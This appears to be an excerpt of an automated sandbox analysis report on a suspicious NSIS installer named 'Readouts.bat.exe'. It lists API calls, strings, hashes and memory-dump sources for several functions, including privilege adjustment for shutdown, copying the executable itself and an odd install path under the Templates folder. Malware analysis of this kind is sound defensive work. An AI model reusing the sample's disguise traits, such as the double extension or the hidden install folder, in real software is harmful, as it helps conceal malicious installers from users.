SetErrorMode.KERNELBASE ref: 0040337C
GetVersion.KERNEL32 ref: 00403382
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
OleInitialize.OLE32(00000000), ref: 004033F9
SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Readouts.bat.exe",00000020,"C:\Users\user\Desktop\Readouts.bat.exe",00000000,?,00000006,00000008,0000000A), ref: 00403462

Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040359C
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035D5
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E6
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035EE
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403602

Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
ExitProcess.KERNEL32 ref: 004036EE
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Readouts.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Readouts.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Readouts.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Readouts.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403743
DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 0040379D
CopyFileW.KERNEL32(C:\Users\user\Desktop\Readouts.bat.exe,00420EA8,?,?,00000006,00000008,0000000A), ref: 004037B1
CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
OpenProcessToken.ADVAPI32(00000000), ref: 00403814
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
ExitProcess.KERNEL32 ref: 00403894

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness, xrefs: 0040357F, 0040369F, 00403749, 00403753
C:\Users\user\AppData\Local\Temp\, xrefs: 00403591, 00403596, 004035AC, 004035B8, 004035C7, 004035D4, 004035E0, 004035E8, 004036FE, 0040370F, 0040371A, 00403726, 00403733, 00403742, 004037F3
UXTHEME, xrefs: 004033A9, 004033AE, 004033B4
SeShutdownPrivilege, xrefs: 00403823
NSIS Error, xrefs: 0040341B
\Temp, xrefs: 004035B3
"C:\Users\user\Desktop\Readouts.bat.exe", xrefs: 00403430, 00403436, 0040362A
.tmp, xrefs: 00403715
TEMP, xrefs: 004035E1
1033, xrefs: 004035FD
Error launching installer, xrefs: 00403684
~nsu, xrefs: 004036F9
Low, xrefs: 004035CF
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon, xrefs: 004036AA
C:\Users\user\Desktop\Readouts.bat.exe, xrefs: 004037AC
TMP, xrefs: 004035E9
C:\Users\user\Desktop, xrefs: 00403720, 00403725, 00403752

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\Readouts.bat.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon$C:\Users\user\Desktop$C:\Users\user\Desktop\Readouts.bat.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-3839123367
Opcode ID: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
Opcode Fuzzy Hash: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E

Function 0040542B Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405489
GetDlgItem.USER32(?,000003EE), ref: 00405498
GetClientRect.USER32(?,?), ref: 004054D5
GetSystemMetrics.USER32(00000002), ref: 004054DC
SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
ShowWindow.USER32(?,00000008), ref: 00405578
GetDlgItem.USER32(?,000003EC), ref: 00405599
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
GetDlgItem.USER32(?,000003F8), ref: 004054A7

Part of subcall function 00404230: SendMessageW.USER32(00000028,?,?,0040405B), ref: 0040423E

GetDlgItem.USER32(?,000003EC), ref: 004055EB
CreateThread.KERNEL32(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
CloseHandle.KERNELBASE(00000000), ref: 00405600
ShowWindow.USER32(00000000), ref: 00405624
ShowWindow.USER32(?,00000008), ref: 00405629
ShowWindow.USER32(00000008), ref: 00405673
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
CreatePopupMenu.USER32 ref: 004056B8
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
GetWindowRect.USER32(?,?), ref: 004056EC
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
OpenClipboard.USER32(00000000), ref: 0040574D
EmptyClipboard.USER32 ref: 00405753
GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
GlobalLock.KERNEL32(00000000), ref: 00405769
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
GlobalUnlock.KERNEL32(00000000), ref: 0040579D
SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
CloseClipboard.USER32 ref: 004057AE

Strings

6B, xrefs: 00405719
{, xrefs: 00405691

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {$6B
API String ID: 590372296-3705917127
Opcode ID: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
Opcode Fuzzy Hash: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68

Function 00405996 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059BF
lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A07
lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A2A
lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A30
FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A40
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
FindClose.KERNEL32(00000000), ref: 00405AEF

Strings

"C:\Users\user\Desktop\Readouts.bat.exe", xrefs: 00405996
C:\Users\user\AppData\Local\Temp\, xrefs: 004059A4
\*.*, xrefs: 00405A01

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Readouts.bat.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3128571757
Opcode ID: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
Instruction ID: c51eb27d53b6fe35fd8e31d26e19e594c53701a60ebafcf50548af423f91ca56
Opcode Fuzzy Hash: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
Instruction Fuzzy Hash: 0641B530A00914AACB21BB658C89BAF7778EF45729F60427FF801711D1D7BC5981DEAE

Function 0040698E Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
Instruction ID: 13591abb153405db8c483c3749d8f5c5d6ef56c483b3dbf0ce0e93ae11c78ade
Opcode Fuzzy Hash: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
Instruction Fuzzy Hash: 58F17871D04269CBDF18CFA8C8946ADBBB0FF44305F25856ED456BB281D3386A8ACF45

Function 004065C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 004065D2
FindClose.KERNEL32(00000000), ref: 004065DE

Strings

8gB, xrefs: 004065C8

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: 8gB
API String ID: 2295610775-1733800166
Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698

Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E67
EnableWindow.USER32(00000000,00000000), ref: 00401E72

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: f0df3e05e3b5ed1159a39937c9662c58851a2e21ea47a233f3ab8e4485993ad4
Instruction ID: 63871ab535fe988d3adb25008cf832d4d85dc6cfcdc2aab035335d2457ba8122
Opcode Fuzzy Hash: f0df3e05e3b5ed1159a39937c9662c58851a2e21ea47a233f3ab8e4485993ad4
Instruction Fuzzy Hash: 2BE0D832E08200CFE724DFA5AA4946D77B4EB80314720447FF201F11D1CE7848418F6D

Function 00403D22 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
ShowWindow.USER32(?), ref: 00403D7B
DestroyWindow.USER32 ref: 00403D8F
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
GetDlgItem.USER32(?,?), ref: 00403DCC
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
IsWindowEnabled.USER32(00000000), ref: 00403DE7
GetDlgItem.USER32(?,?), ref: 00403E95
GetDlgItem.USER32(?,00000002), ref: 00403E9F
SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F0A
GetDlgItem.USER32(?,00000003), ref: 00403FB0
ShowWindow.USER32(00000000,?), ref: 00403FD1
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FE3
EnableWindow.USER32(?,?), ref: 00403FFE
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404014
EnableMenuItem.USER32(00000000), ref: 0040401B
SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404033
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
SetWindowTextW.USER32(?,004236E8), ref: 00404084
ShowWindow.USER32(?,0000000A), ref: 004041B8

Strings

6B, xrefs: 00404060

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: 6B
API String ID: 3282139019-4127139157
Opcode ID: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
Opcode Fuzzy Hash: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D

Function 00403974 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B

lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Readouts.bat.exe",00000000), ref: 004039F5
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A75
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
GetFileAttributesW.KERNEL32(Call), ref: 00403A93
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness), ref: 00403ADC

Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8

RegisterClassW.USER32(004291A0), ref: 00403B19
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
ShowWindow.USER32(00000005,00000000), ref: 00403B9C
GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
RegisterClassW.USER32(004291A0), ref: 00403BDE
DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness, xrefs: 00403A04, 00403A0C, 00403AAF, 00403AB5, 00403AC5
RichEd32, xrefs: 00403BB0
.exe, xrefs: 00403A82
C:\Users\user\AppData\Local\Temp\, xrefs: 00403980
6B, xrefs: 004039A0
.DEFAULT\Control Panel\International, xrefs: 004039E0
RichEd20, xrefs: 00403BA2
"C:\Users\user\Desktop\Readouts.bat.exe", xrefs: 00403978
RichEdit, xrefs: 00403BCF
1033, xrefs: 00403994, 004039F0
Control Panel\Desktop\ResourceLocale, xrefs: 004039A8
_Nb, xrefs: 00403AF8, 00403B60
Call, xrefs: 00403A3C, 00403A45, 00403A53, 00403AA2, 00403AA8
RichEdit20W, xrefs: 00403BC0, 00403BC6

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Readouts.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
API String ID: 1975747703-889526941
Opcode ID: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
Instruction ID: ac693f2390e271b0591ead3bca04d252cd9040af8bb9d400f005d771bc7483c2
Opcode Fuzzy Hash: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
Instruction Fuzzy Hash: 0D61B770244600BFE630AF269D46F273A6CEB44B45F40057EF985B62E2DB7D5911CA2D

Function 00402EDD Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402EEE
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Readouts.bat.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A

Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Readouts.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Readouts.bat.exe,C:\Users\user\Desktop\Readouts.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56

Strings

soft, xrefs: 00402FCB
Null, xrefs: 00402FD4
"C:\Users\user\Desktop\Readouts.bat.exe", xrefs: 00402EDD
